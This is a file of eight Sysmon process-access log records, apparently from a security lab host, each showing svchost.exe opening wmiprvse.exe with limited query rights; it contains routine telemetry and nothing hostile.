{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1060,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1061,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.125\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.125","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1062,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1063,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1064,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1065,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1066,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1067,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:35.141\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B9-5F25-0000-001012B90100}\r\nTargetProcessId: 2816\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:35.141","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B9-5F25-0000-001012B90100}","TargetProcessId":"2816","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
